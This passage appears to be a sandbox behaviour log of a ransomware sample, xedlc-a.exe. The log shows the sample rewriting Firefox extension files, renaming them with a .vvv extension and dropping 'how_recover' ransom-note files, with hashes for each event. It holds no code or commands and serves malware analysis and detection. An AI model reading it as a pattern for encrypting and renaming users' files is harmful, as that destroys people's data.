- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778342
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78294
- mode: open
- sequenceNumber: 1163
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js
- filesize: 7984
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765869
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78379
- mode: close
- sequenceNumber: 1164
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js
- filesize: 8414
- md5sum: 7a97a0dc17a04c7f5980d4a91a5ae456
- sha1sum: a63905590a442c878008dd57fc7cf083a2406c60
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765869
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78394
- mode: rename
- sequenceNumber: 1165
- filesize: 8414
- md5sum: 7a97a0dc17a04c7f5980d4a91a5ae456
- sha1sum: a63905590a442c878008dd57fc7cf083a2406c60
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10s.js.vvv
- ads:
- fid (ads:): 281474976765869
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78406
- mode: open
- sequenceNumber: 1166
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js
- filesize: 3447
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765917
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78430
- mode: close
- sequenceNumber: 1167
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js
- filesize: 3870
- md5sum: cafa912da202b50f99591b5ec498869c
- sha1sum: 073d30bc5f15bb1ca6d477dc2cb4e807cf40fdc8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765917
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78442
- mode: rename
- sequenceNumber: 1168
- filesize: 3870
- md5sum: cafa912da202b50f99591b5ec498869c
- sha1sum: 073d30bc5f15bb1ca6d477dc2cb4e807cf40fdc8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\errors.js.vvv
- ads:
- fid (ads:): 281474976765917
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78455
- mode: open
- sequenceNumber: 1169
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js
- filesize: 3456
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765884
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78511
- mode: close
- sequenceNumber: 1170
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js
- filesize: 3886
- md5sum: b2391e96ded857ed846a9be66a5ba832
- sha1sum: 4e09f60eafd5d87d3be34b3706b5dccc0c5bcdf4
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765884
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78524
- mode: rename
- sequenceNumber: 1171
- filesize: 3886
- md5sum: b2391e96ded857ed846a9be66a5ba832
- sha1sum: 4e09f60eafd5d87d3be34b3706b5dccc0c5bcdf4
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\assembler.js.vvv
- ads:
- fid (ads:): 281474976765884
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78535
- mode: created
- sequenceNumber: 1172
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778343
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78545
- mode: close
- sequenceNumber: 1173
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778343
- ntstatus: 0x0
- CreateOptions: 0x0
- apicall:
- timestamp: 78551
- repeat: 100
- sequenceNumber: 1174
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 78569
- mode: created
- sequenceNumber: 1175
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778344
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78577
- mode: close
- sequenceNumber: 1176
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778344
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78587
- mode: open
- sequenceNumber: 1177
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js
- filesize: 7598
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765918
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78633
- mode: close
- sequenceNumber: 1178
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js
- filesize: 8014
- md5sum: ddb7e376f8af080162a6866e713915fe
- sha1sum: d22fc492d2daa708378cc45fc7cf3233742524f1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765918
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78646
- mode: rename
- sequenceNumber: 1179
- filesize: 8014
- md5sum: ddb7e376f8af080162a6866e713915fe
- sha1sum: d22fc492d2daa708378cc45fc7cf3233742524f1
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\events.js.vvv
- ads:
- fid (ads:): 281474976765918
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78658
- mode: open
- sequenceNumber: 1180
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js
- filesize: 6618
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476262
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78710
- mode: close
- sequenceNumber: 1181
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js
- filesize: 7038
- md5sum: 04fe9ce1a96cada1d01a3e8ec0f25356
- sha1sum: 4bb27564e106af86051c692edcbcc35f921a917a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476262
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78722
- mode: rename
- sequenceNumber: 1182
- filesize: 7038
- md5sum: 04fe9ce1a96cada1d01a3e8ec0f25356
- sha1sum: 4bb27564e106af86051c692edcbcc35f921a917a
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\file.js.vvv
- ads:
- fid (ads:): 562949953476262
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78734
- mode: open
- sequenceNumber: 1183
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js
- filesize: 3970
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476253
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78870
- mode: close
- sequenceNumber: 1184
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js
- filesize: 4398
- md5sum: d787790aa70716a8cb3f0b97ae4be09c
- sha1sum: 1e42299b7363bbd06059f5fde3a2227ef891f6d8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476253
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78885
- mode: rename
- sequenceNumber: 1185
- filesize: 4398
- md5sum: d787790aa70716a8cb3f0b97ae4be09c
- sha1sum: 1e42299b7363bbd06059f5fde3a2227ef891f6d8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests-e10s-adapter.js.vvv
- ads:
- fid (ads:): 562949953476253
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78899
- mode: open
- sequenceNumber: 1186
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js
- filesize: 38
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765913
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78909
- mode: close
- sequenceNumber: 1187
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js
- filesize: 462
- md5sum: 7b02a6546537ebae0926b71c33ee05cc
- sha1sum: fdc93d334b6086fc204fb10dcc5b7da5b7cb86aa
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765913
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78924
- mode: rename
- sequenceNumber: 1188
- filesize: 462
- md5sum: 7b02a6546537ebae0926b71c33ee05cc
- sha1sum: fdc93d334b6086fc204fb10dcc5b7da5b7cb86aa
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\find-tests.js.vvv
- ads:
- fid (ads:): 281474976765913
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78940
- mode: open
- sequenceNumber: 1189
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js
- filesize: 7014
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765902
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79112
- mode: close
- sequenceNumber: 1190
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js
- filesize: 7438
- md5sum: 39e881253a5de131dcfa4586e9558599
- sha1sum: cc17021604144e342171933badbacbf763581671
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765902
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79124
- mode: rename
- sequenceNumber: 1191
- filesize: 7438
- md5sum: 39e881253a5de131dcfa4586e9558599
- sha1sum: cc17021604144e342171933badbacbf763581671
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hidden-frame.js.vvv
- ads:
- fid (ads:): 281474976765902
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79137
- mode: open
- sequenceNumber: 1192
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js
- filesize: 5226
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765879
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79234
- mode: close
- sequenceNumber: 1193
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js
- filesize: 5646
- md5sum: 2886f0d9051b7efb7fd5aaf5048993ed
- sha1sum: 83877333213ddfc055ca4276a2aaf618baa88816
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765879
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79252
- mode: rename
- sequenceNumber: 1194
- filesize: 5646
- md5sum: 2886f0d9051b7efb7fd5aaf5048993ed
- sha1sum: 83877333213ddfc055ca4276a2aaf618baa88816
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\hotkeys.js.vvv
- ads:
- fid (ads:): 281474976765879
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79265
- mode: open
- sequenceNumber: 1195
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js
- filesize: 3351
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765855
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79275
- mode: close
- sequenceNumber: 1196
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js
- filesize: 3774
- md5sum: dc9b7dcfba608e2b0ae08877fd4564f0
- sha1sum: b0c571e646369033b3b5bfb32f8571db4d1bf73e
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976765855
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79289
- mode: rename
- sequenceNumber: 1197
- filesize: 3774
- md5sum: dc9b7dcfba608e2b0ae08877fd4564f0
- sha1sum: b0c571e646369033b3b5bfb32f8571db4d1bf73e
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\observer.js.vvv
- ads:
- fid (ads:): 281474976765855
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79300
- mode: open
- sequenceNumber: 1198
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js
- filesize: 6658
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476251
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79330
- mode: close
- sequenceNumber: 1199
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js
- filesize: 7086
- md5sum: a883fba32b37c591cbb493d26a3a3385
- sha1sum: c4d905cbd29b64cb0b23f8c7b051bfb292b8ef7f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953476251
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79343
- mode: rename
- sequenceNumber: 1200
- filesize: 7086
- md5sum: a883fba32b37c591cbb493d26a3a3385
- sha1sum: c4d905cbd29b64cb0b23f8c7b051bfb292b8ef7f
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\utils.js.vvv
- ads:
- fid (ads:): 562949953476251
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79357
- mode: created
- sequenceNumber: 1201
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778345
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79367
- mode: close
- sequenceNumber: 1202
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\keyboard\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778345
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79376
- mode: created
- sequenceNumber: 1203
